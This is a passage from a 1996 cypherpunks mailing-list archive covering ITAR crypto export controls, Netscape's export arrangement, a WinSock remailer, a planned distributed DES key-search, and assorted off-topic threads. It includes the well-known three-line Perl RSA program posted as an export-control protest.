a weapons designer.  I build the weapons, someone else fights 
the wars.  Freedom needs weapons designers and warriors.

That is my version of "Cypherpunk Patriotism".

I offered my detractor a copy of the remailer so that he can
run his own remailer and fight his war with COS.  Let's see if
he puts up or shuts up.  My guess is the latter.

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 25 Jul 1996 07:19:37 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Netscape
In-Reply-To: <199607241752.KAA02103@mail.pacifier.com>
Message-ID: <Pine.LNX.3.94.960724183251.2024A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 24 Jul 1996, jim bell wrote:

> Date: Wed, 24 Jul 1996 10:52:01 -0800
> From: jim bell <jimbell@pacifier.com>
> To: The Deviant <deviant@pooh-corner.com>,
>     Tom Weinstein <tomw@netscape.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Netscape
> 
> At 07:00 PM 7/23/96 +0000, The Deviant wrote:
> 
> >On Mon, 22 Jul 1996, Tom Weinstein wrote:
> 
> >> Also, notice the simple verification system MIT was allowed to use, and
> >> the complex one we're required to use.
> >> 
> >
> >I'm curious, exactly whop is it that _required_ you to use that system.?
> 

Damn I can't type at that hour.

> 
> Excellent point.  There's a difference (or, at least, there had BETTER BE a 
> difference!) between following the laws and "doing everything the government 
> wants, exactly the way it wants."  It would be interesting to see the 
> specific explanation which was given Netscape as to why they were required 
> (if, indeed, they were required...) to use a specific system.  
> 

Something which we are still waiting for...

> 
> It seems to me that a far more productive stance by Netscape would have been 
> to say to the State Department, "We're going to put this software on the 
> 'net.  We're happy to put in any precautions which are SPECIFICALLY required 
> under law and/or ITAR.  However, we insist that you document the fact that 
> they are required, with full and complete legal explanations for your 
> assertions.  Moreover, we insist that you explain why this position is 
> consistent with MIT's posting of PGP."
> 

I would have suggested even being as nice as "We'll do the same as MIT
does with PGP's distrobution, or RSA does with RSAREF (just so you'll
know, RSA's FTP basicly has a readme file that says "the files in subdir
of a dir thats -r+x to you, so if you're a citizen go to
dist/usaRANDOM_NUMBER_HERE", thats it).  Then make them explain why
Netscape should be any different.

> 
> At the very least, this would have set the government's position WRT ITAR in 
> stone,  Part of the reason the governemnt has gotten so much 'mileage' out 
> of ITAR is the fact that they morph it to do whatever they want, whenever 
> they  want.  The best way to fight this is to tie down their position.
> 

Something which has to be done sometime, sooner preferably.

 --Deviant
Talking much about oneself can also be a means to conceal oneself.
		-- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfZthDAJap8fyDMVAQFAnwf9EM7i0HecB4+m7E0Rlz0tbogkVhcdqCoe
to1tiW7hz0kyBCeONoAnvJaT0fCGc/R8d7M4G6ZeCsGdb+VY21NbgmKIzhhsCqW5
rnEb0KXQkKGvXiQzZXfBS0kHylO+4to+hSYCQTLyIZZPKLifZvQerZHfGvU3Auos
dLk+k1l0kZnoxrzyJDD0hcaAp8Td90J2pbrTr8bgNhqNGozLTuV0QWEnqY5ygWd7
IkTrQppoSJ6zLDMvw52ckDMJCeDsik/Vuh24cqCN9/ztgiol5m1Dq+YYk+48XP3D
En+xhgWz0ujttkcY1N5I5HK7QWK17g+LWL/eNfVsxXRTIQkrkKZPuA==
=IlTW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Thu, 25 Jul 1996 12:46:24 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Netscape
In-Reply-To: <Pine.LNX.3.94.960724183251.2024A-100000@switch.sp.org>
Message-ID: <31F6D034.237C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant wrote:
> 
> I would have suggested even being as nice as "We'll do the same as MIT
> does with PGP's distrobution, or RSA does with RSAREF (just so you'll
> know, RSA's FTP basicly has a readme file that says "the files in
> subdir of a dir thats -r+x to you, so if you're a citizen go to
> dist/usaRANDOM_NUMBER_HERE", thats it).  Then make them explain why
> Netscape should be any different.

MIT reportedly has a letter stating that their systems is okay.  The
state department wouldn't give us such a letter because they were
"currently reevaluating their guidelines", or some such thing.  We
convinced them to give us temporary permission for this system until
they had finalized their new policy.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 25 Jul 1996 01:02:48 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape (foreign downloads)
Message-ID: <1.5.4.32.19960724124517.002e1fcc@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 01:11 23/07/96 -0700, Jeff Weinstein wrote:

>  I certainly have sympathy for those who want to make a point
>by uploading our US software to hacktic and other foreign servers,
>but I think that my company will probably have to ask hacktic
>and others to remove these copies.
>

And what are your plans for those outside the US who have downloaded
from hacktic? While I'm sure your copyright allows you to do so,
don't suppose you have any plans of going after them?

Suppose I,  as a foreigner, were to obtain a copy
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 25 Jul 1996 12:49:15 +0800
To: snow <llurch@networking.stanford.edu>
Subject: violating ITAR
Message-ID: <1.5.4.32.19960724124527.002ef944@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 21:43 21/07/96 -0500, snow wrote:
>
>     Put up enough money to defend me and tell me how I can get arrested. 
>
>     I'm not doing a lot at the moment, and I wouldn't mind getting my 15 
>minutes of fame at this point. 

I could spare the time too. Maybe you (and whoever else
volunteers) could DCC me some software that violates ITAR via
mIRC: We announce that this is going to happen, which channel and
when, have a virtual party for the condemned person(s), during
which we first  openly discuss what we are going to do...

I doubt they'll want to take me to court in India, but if they
do, I know lawyers who
would defend me for free.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: LKWendel@aol.com
Date: Thu, 25 Jul 1996 09:33:00 +0800
To: cypherpunks@toad.com
Subject: Re: E-Cash promotion idea
Message-ID: <960724185337_369434219@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-07-24 11:30:07 EDT, paul@ljl.com (Paul Robichaux)
writes:

<< The Visa stored-value cards now in Atlanta don't do this, but as a
 simplifying measure most vendors in the Olympic Village (and many within
 the downtown venue ring) have rounded prices to the nearest US$.
 The precedent's been set.
  >>
I'm confused.  Why can't the Visa Stroed Value program accept exact amount on
the card?  And if the card runs out of value and is not reloadable, why not
just supplement the difference with cash?

Regards,

Lisa Kops-Wendel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 25 Jul 1996 07:06:07 +0800
To: cypherpunks@toad.com
Subject: Re: Parsing John Youn (Re: OPS_nuk)
Message-ID: <199607241920.TAA22026@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 25, 1996 03:46:19, 'tcmay@got.net (Timothy C. May)' wrote: 
 
 
>P.S. John Young does an invaluable service in forwarding items and making
them  
>available at his site, but I find parsing his text into something  
>understandable a real chore. Too bad when style gets in the way of
substance,  
>unless, of course, ones aspires to Joycehood. 
 
 
Tim, pity the moot transcriber a-choring (spit). It's a grind (pus)
forwarding other's fishwrap (buggers), hardly able to contain one's
gibbering idiocy (pee) counterreaction to the new's gratuitous fatuity
(dookie). 
 
 
Usually, though, one's bowel-rumblings (Bic lits) pass unnosed in the
c'punk parfumerie. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 25 Jul 1996 13:02:33 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <Pine.LNX.3.93.960724193050.384E-100000@smoke.suba.com>
Message-ID: <Pine.SUN.3.91.960724192714.675F-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 24 Jul 1996, snow wrote:

>      If you trust me, I'll hold the cash under the following stipulations: 
> 
>      1) The exact terms of the bet are spelled out in writing and digitally
>         signed by both parties. 
>  
>      2) That an agreement on the term "nationally TV show" is reached.
> 
>      3) That the payment is in the form of a cashiers check made out to the 
>         me, and that each person send a SASE with their cashiers check so 
>         that I can send the winner their check, without having to deal with 
>         it.

Works for me.  Phil?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 25 Jul 1996 11:56:53 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Digital Watermarks for copy protection in recent Billbo
In-Reply-To: <ae1bbff80e0210045f8c@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960724192805.384D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jul 1996, Timothy C. May wrote:
> I am not a lawyer, but I've virtually certain that "receiving stolen
> property" laws involve terms like "knowingly" and/or "conspiracy." That is,
> "scienter."
> 
> While "ignorance of the law is no excuse" is certainly true in many cases,
> the law comprehends the reality that certain actions are not crimes if no
> knowledge of a criminal act was involved. (Sorry if this is not phrased
> more clearly.)
> 
> Thus, the guy who buys a bicycle that later turns out to have been stolen,
> will usually lose the bicycle, but is not knowingly receiving stolen
> property and hence is guilty of no crime. And no DA will charge him; the
> courts and jails are already clogged up enough. Of course, if he _knew_ the
> bicycle was stolen (e.g., he "placed an order" to have one stolen, a market
> which actually exists in some places, usually for cars), then "scienter"
> has been met, and perhaps "conspiracy," and so prosecution is more likely.

     Unless the point is not to prosecute, but to harass.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 25 Jul 1996 13:12:02 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: When books are outlawed
In-Reply-To: <Pine.SV4.3.91.960724180436.18101J-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960724193215.675G-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 24 Jul 1996, Alan Horowitz wrote:

> << On Our Backs magazine>>
> 
> That's "Off Our Backs".  Very much at the forefront of the 
> PC-gestapo-thought-police trend.

Actually, there is a magazine called "On Our Backs."  The editor
is (was?) Suzie Bright and it was name in concious satire of
"Off Our Backs."  It's a sex-positive, politically incorrect
lesbian erotica mag.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 25 Jul 1996 09:36:21 +0800
To: stewarts@ix.netcom.com
Subject: Re: Exporting cryptosystems in pieces: Re: Question [NOISE, mostly]
In-Reply-To: <199607240942.CAA19145@toad.com>
Message-ID: <199607241835.TAA00366@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart <stewarts@ix.netcom.com> writes:
> Vince Cate's arms exporter page lets you export a highly-useful
> fully working cryptosystem in three lines with one mouse click
> (developed by Adam Back and an international cast of dozens.)

Vince Cate:	http://online.offshore.com.ai/arms-trafficker/
export RSA:	http://www.dcs.ex.ac.uk/~aba/rsa/

> Adam Back's export-three-lines-of-PGP-at-once is a more blatant test
> of this; go see his web pages.

export PGP:	http://www.dcs.ex.ac.uk/~aba/export/

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 25 Jul 1996 11:54:44 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <Pine.SUN.3.91.960724131940.15926A-100000@crl3.crl.com>
Message-ID: <Pine.LNX.3.93.960724193050.384E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jul 1996, Sandy Sandfort wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> On Wed, 24 Jul 1996 hallam@Etna.ai.mit.edu wrote:
> > It is shallow logic, but it is Rush's own logic. He promotes the
> > idea that success is measured in ecconomic terms. The failure of his
> > TV show demonstrates the failure of his ideas under the criteria 
> > which he himself espouses.
> Or maybe he is uping the ante.  Tell you what Phil, I'll bet you
> US$50 aganist your L25 (in other words, I giving you odds at the
> current rate of exchange) that Limbaugh have a nationally TV show
> on or before 1 October 1996.
> If you are willing to put your money where your mouth is, just
> say you agree to these terms in a post to the list.  After that,
> we can agree to appoint someone to declare a winner and hold the
> money in the meantime.  Any volunteers for the honor?

     If you trust me, I'll hold the cash under the following stipulations: 

     1) The exact terms of the bet are spelled out in writing and digitally
        signed by both parties. 
 
     2) That an agreement on the term "nationally TV show" is reached.

     3) That the payment is in the form of a cashiers check made out to the 
        me, and that each person send a SASE with their cashiers check so 
        that I can send the winner their check, without having to deal with 
        it.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 25 Jul 1996 13:19:12 +0800
To: adam@homeport.org (Adam Shostack)
Subject: Re: Data Sources for DES Breaking
In-Reply-To: <199607250219.VAA03426@homeport.org>
Message-ID: <199607250244.TAA23196@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:

 > This did not happen when cypherpunk Hal Finney posted a
 > message and challenge; everyone saw that resources were
 > assembled, and the key was cracked.

I think an effort to crack DES differs somewhat from factoring
RSA moduli or breaking 40 bit SSL in that tempting test data is
not everywhere for the taking. It may therefore be somewhat more
difficult for the typical reader to abstract a "what this means
for my data" scenario from the results of such an effort, and we
should expect at least a small amount of FUD from the American
Banking Association, which will recoil in horror at any
suggestion that what they are currently doing is not secure.

If we were preparing to attack something with a very visible
common application, like Unix Crypt(3), I would agree with you
that everyone would understand and see what was happening, just
as people were easily able to understand the notion of capturing
data during an SSL handshake, and pounding on it with large
numbers of CPU cycles.

 > What I see as more likely than 'did/did not' is the
 > Netscape-style assertion that the computer time used cost N
 > million dollars (Ok, NS claimed the compute cycles were
 > worth $10,000.)

Netscape's attempts at damage control were sorely limited by the
fact that the data used for the crack was captured during the
normal operation of their software.  Had Hal done some sort of
known plaintext attack on 40 bit RC4 outside the context of a
specific widely-used application, it is possible that a lot of
time would have been wasted countering the inevitable "this
doesn't apply to us" arguments from various software vendors,
with the general public understanding none of the terminology
used in the debate.  This would definitely have softened the
media impact of the accomplishment.

 > As such, the analysis needs to be presented in light of the
 > fact that 3des would take 3 times as long to encrypt, and
 > take 2**56 times as many dollars worth of compute power to
 > decrypt.  To put that to scale, if the computer power to
 > break des is one cent, the federal debt (5 trillion)
 > wouldn't get you close to breaking 3des.

Correct.  But breaking a real-life example of single DES would be
a nice rejoinder to those who continue to insist, in the face of
strong grumbling by the cryptographic community, that single DES
is a cipher with many more years of useful life left in it.

If this speeds the adoption of second generation ciphers by major
players in the national infrastructure, then it will have been a
useful exercise.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 25 Jul 1996 09:56:14 +0800
To: amehta@giasdl01.vsnl.net.in
Subject: Re: violating ITAR
In-Reply-To: <1.5.4.32.19960724124527.002ef944@giasdl01.vsnl.net.in>
Message-ID: <199607241854.TAA00377@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Arun Mehta <amehta@giasdl01.vsnl.net.in> writes:
> At 21:43 21/07/96 -0500, snow wrote:
> >
> >     Put up enough money to defend me and tell me how I can get arrested. 

You could try exporting this, and turning yourself in to the feds:


#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)


problem is they'd probably let you go again, not wanting to make asses
of themselves.  (Some time ago, Raph Levien filed a CJR with the
Office of Defense Trade Controls (permission to export) for a T-shirt
with this code on it, as far as I know they have not deigned to answer
him so far).  Also I think many thousands of people already exported
it with no ill-effect, but no one that I know demanded to be locked
up, or announced to the media/feds that they were going to do it
before hand.

Maybe you and all the people listed on Vinces Arms Exports page could
turn themselves in, and demand to be locked up :-)

> >     I'm not doing a lot at the moment, and I wouldn't mind getting my 15 
> >minutes of fame at this point. 
> 
> I could spare the time too. Maybe you (and whoever else
> volunteers) 

Would there be safety in numbers perhaps?  I wonder how many people
would be interested in exporting a share of PGP, say a 50th part or
however many exports you can interest.  It'd probably be a good idea
for someone outside the US to organise so that there'd be no
discernable `ring-leader' they could pin it on in the US.

> [IRC]

Just post it here, and Cc it president@whitehouse.com, and some fed
informants email if there is one!

Adam
--
http://www.dcs.ex.ac.uk/~aba/rsa/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 25 Jul 1996 13:31:10 +0800
To: Tom Weinstein <deviant@pooh-corner.com>
Subject: Re: Netscape
Message-ID: <199607250317.UAA03425@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:39 PM 7/24/96 -0700, Tom Weinstein wrote:
>The Deviant wrote:
>> 
>> I would have suggested even being as nice as "We'll do the same as MIT
>> does with PGP's distrobution, or RSA does with RSAREF (just so you'll
>> know, RSA's FTP basicly has a readme file that says "the files in
>> subdir of a dir thats -r+x to you, so if you're a citizen go to
>> dist/usaRANDOM_NUMBER_HERE", thats it).  Then make them explain why
>> Netscape should be any different.
>
>MIT reportedly has a letter stating that their systems is okay.  The
>state department wouldn't give us such a letter because they were
>"currently reevaluating their guidelines", or some such thing.  We
>convinced them to give us temporary permission for this system until
>they had finalized their new policy.


That still doesn't make since.

First, there were laws.  And we had to obey them.

Then, they added ITAR.  And they want us to obey it.

Finally, it seems, they're giving us "guidelines."  Not law, Not ITAR.

Next it's gonna be their their fondest desires, their preferences,and 
finally their whims.

What's wrong with this picture?    Do I detect an ass-kissing contest?

You should have told them that if they're "evaluating their guidelines" that 
means that NO future modifications to those guidelines is binding on you, 
since it is not part of ITAR and is CERTAINLY not part of the law.  You 
should have memorialized the contact with a lawyer's letter, and promptly 
posted the new version of your software with whatever version of the 
precautions  (MIT, RSA, or?) you felt most happy with.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 25 Jul 1996 13:32:44 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: When books are outlawed
Message-ID: <2.2.32.19960725031831.00da51a4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:07 PM 7/24/96 -0400, you wrote:
>
><< On Our Backs magazine>>
>
>That's "Off Our Backs".  Very much at the forefront of the 
>PC-gestapo-thought-police trend.
>
>Also has a _fabulous_ running comic strip about the reality of lesbian 
>relationships. "Dykes to watch out For", if my memory serves me well.

Off Our Backs is a PC lesbian magazine.  "On Our Backs" is an S&M Lesbian
magazine edited by Suzie Bright.  It is not anything resembling PC.  (Ms.
Bright does not have a nice oppinion of Dwarkin and her fellow travelers, to
put it mildly.)

ObOff-Topic: If you ever get the chance to hear Suzie Bright speak on one of
her tours, by all means go.  It is well worth the time!

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 25 Jul 1996 11:16:58 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Digital Watermarks (long, getting off-topic)
Message-ID: <2.2.32.19960725002302.008aeae0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 AM 7/24/96 -0800, jim bell wrote:

>Isn't it odd that when music is sold, CD's are MORE expensive than cassette 
>tapes, even though you _know_ that the manufacturing cost of CD's is less?

CDs sell for more because buyers decided that they wanted a wider range of
titles with shallower sales (hence higher unit costs) rather than a narrower
range of titles with lower sales prices.  The number of CD titles available
is far greater (in general distribution) than the number of vinyl titles
that were available during vinyl's peak year.  This greater availability of
short run pressings raises average unit sales costs justifying the higher
prices.  Had the market decided (when physical production costs fell) that
it was satisfied with a Top-40 CD stock, average CD prices would have fallen
to vinyl levels.

>Another oddity:  The price for a blank, standard-quality videocassette is 
>about the same as that of a blank, standard-quality audio cassette tape, 
>despite the fact that the volume of tape included in the former is probably 
>about a factor of 10 higher.

Materials cost is a minor part of total cost.

In both cases, the cost of production is a small part of the cost of goods
sold.  Almost all of that cost is the cost of marketing (as with all
mass-market products in a modern capitalist economy.

DCF

"The only adequate description of the Universe is the Universe itself.  The
only fair price of an item is the market price.  Neither the Universe nor
the Market can be adequately duplicated in the head of a Congresscritter."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 25 Jul 1996 11:23:59 +0800
To: olmur@dwarf.bb.bawue.de (Olmur)
Subject: Re: Brute Force DES
In-Reply-To: <m2687dxpfk.fsf@dwarf.bb.bawue.de>
Message-ID: <199607250209.VAA03377@homeport.org>
MIME-Version: 1.0
Content-Type: text



"I can contribute an 286 full time and a powerPC on evenings."

Thats just great.  Really.  Thanks so much.  With 15 machines working
nights and weekends, it should take only another 100,000 messages like
that one to get us to the point where we can crack DES in a year.

I don't want to slam people offering machines.  But there will be a
time & place to pony up for keyspace to start searching.  Now is not
that time.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 25 Jul 1996 14:46:39 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Digital Watermarks (long, getting off-topic)
Message-ID: <199607250418.VAA06574@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:23 PM 7/24/96 -0400, Duncan Frissell wrote:
>At 10:26 AM 7/24/96 -0800, jim bell wrote:
>
>>Isn't it odd that when music is sold, CD's are MORE expensive than cassette 
>>tapes, even though you _know_ that the manufacturing cost of CD's is less?
>
>CDs sell for more because buyers decided that they wanted a wider range of
>titles with shallower sales (hence higher unit costs) rather than a narrower
>range of titles with lower sales prices.  The number of CD titles available
>is far greater (in general distribution) than the number of vinyl titles
>that were available during vinyl's peak year.  This greater availability of
>short run pressings raises average unit sales costs justifying the higher
>prices.  Had the market decided (when physical production costs fell) that
>it was satisfied with a Top-40 CD stock, average CD prices would have fallen
>to vinyl levels.

I'm afraid that quantitatively, this is utter nonsense.  

A relevant data point is the fact that for about $1000, anybody can have 
1000 copies of a custom CDROM manufactured.  That, by music industry 
standards, is an EXCEEDINGLY low production run.  The difference in cost 
between such a CD, and one made in quantities of 100K to 1 million can't 
possibly exceed 90 cents or so.  While the early days of CD's were marked by 
lack of capacity, it is obvious that if the pressing plants are now 
accepting orders for pressing runs of 1K or less, there is plenty of 
capacity left in the industry.  The extra manufacturing cost for those extra 
titles certainly can't be found in the cost of production.

So how about record stores?  Are you suggesting that the fact that there are 
"too many titles" are somehow increasing costs so much that $8 vinyl turned 
into $13.95 CD's?  But how can this be?  CD's are physically smaller than 
vinyl records.  Cheaper to transport and store, and cheaper to display.  And 
they are certainly not more expensive to advertise!

No, the number of titles available has essentially NOTHING to do with the 
price.  I'm truly astonished that you would think this to be true.


>>Another oddity:  The price for a blank, standard-quality videocassette is 
>>about the same as that of a blank, standard-quality audio cassette tape, 
>>despite the fact that the volume of tape included in the former is probably 
>>about a factor of 10 higher.
>
>Materials cost is a minor part of total cost.
>
>In both cases, the cost of production is a small part of the cost of goods
>sold.  Almost all of that cost is the cost of marketing (as with all
>mass-market products in a modern capitalist economy.


Then why is it more expensive to market a cassette audio tape, over a videocassette?!?
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 25 Jul 1996 11:25:35 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: Data Sources for DES Breaking
In-Reply-To: <199607242051.NAA13352@netcom5.netcom.com>
Message-ID: <199607250219.VAA03426@homeport.org>
MIME-Version: 1.0
Content-Type: text


	This did not happen when cypherpunk Hal Finney posted a
message and challenge; everyone saw that resources were assembled, and
the key was cracked.

	What I see as more likely than 'did/did not' is the
Netscape-style assertion that the computer time used cost N million
dollars (Ok, NS claimed the compute cycles were worth $10,000.)

	As such, the analysis needs to be presented in light of the
fact that 3des would take 3 times as long to encrypt, and take 2**56
times as many dollars worth of compute power to decrypt.  To put that
to scale, if the computer power to break des is one cent, the federal
debt (5 trillion) wouldn't get you close to breaking 3des.

	Or IDEA takes roughly as long to encrypt, and is even
stronger.  And available to forigners, since it was invented, and
patented, in the free world.

Adam

Mike Duvos wrote:

| If a lone Cypherpunk simply encrypts a file with DES-ECB, hides
| the key in a drawer, and publishes the cyphertext and plaintext
| for use in a distributed cracking effort, there will of course
| be the suggestion that the exercise was rigged, and any public
| policy implications will be lost in the endless "Was So/Was Not"
| quibbling which will undoubtedly take place after the crack is
| complete.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 25 Jul 1996 11:54:02 +0800
To: jgrasty@gate.net
Subject: Re: My Cypherpunk Patriotism
In-Reply-To: <199607242218.SAA25988@osceola.gate.net>
Message-ID: <199607250229.VAA03459@homeport.org>
MIME-Version: 1.0
Content-Type: text


	I'd like to publicly commend Joey for releasing a winsock
remailer.  Having a remailer that will run on 50 million desktops is a
very powerful and important fact, and one that will make it much
harder to destroy the remailer network.  I'd also expect to see a lot
more remailers a year or so from now.  (Technology takes time to catch
on.)

Adam

Joey Grasty wrote:

| I received the following fan mail today, in regards to my 
| announcement of the WinSock Remailer.  In my announcement, I 
| noted that I have blocked the Church of Scientology discussion 
| groups alt.religion.scientology and alt.clearing.technology.  
| The author shall remain anonymous:
| 
| > Please make your blocking configurable in a text file that
| > the remailer reads at startup time.  Other people who install
| > your remailer may not feel the need to surrender to
| > the Church of Scientology's legal terrorism the way you have.

| Fighting "wars" is for the young and strong.  Think of me as
| a weapons designer.  I build the weapons, someone else fights 
| the wars.  Freedom needs weapons designers and warriors.
| 
| That is my version of "Cypherpunk Patriotism".


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Conrad_Burns@burns.senate.gov
Date: Thu, 25 Jul 1996 14:02:18 +0800
To: Multiple recipients of list <com-priv@lists.psi.com>
Subject: Open Letter to the Net from Sens. Burns, Pressler & Ashcroft
Message-ID: <9606248382.AA838269149@smtpgwys.senate.gov>
MIME-Version: 1.0
Content-Type: text/plain


     AN OPEN INVITATION TO THE INTERNET COMMUNITY FROM MEMBERS OF
     THE SENATE COMMERCE COMMITTEE
     
     July 23, 1996
     
     This week, the Senate Commerce Committee will take a historic step 
     forward toward enhancing citizens participation in the democratic 
     process via the Internet.  On Thursday July 25 the Committee's hearing 
     on S. 1726, the "Pro-CODE" Act of 1996 will be cybercast live on the 
     Internet.
     
     As many of you are well aware, the debate over US encryption policy is 
     of vital importance to the future development of the Internet and the 
     privacy of all Americans.   We are writing to invite you to join us in 
     this unique event. And to help the Committee better understand your 
     concerns about privacy and security on the Internet, we are inviting 
     you to submit your thoughts for the hearing record via the World Wide 
     Web and to discuss the issues with us and members of our staff live 
     online during the hearing.
     
     Information on how you can join the cybercast, submit your thoughts 
     for the record, and participate in an online discussion with 
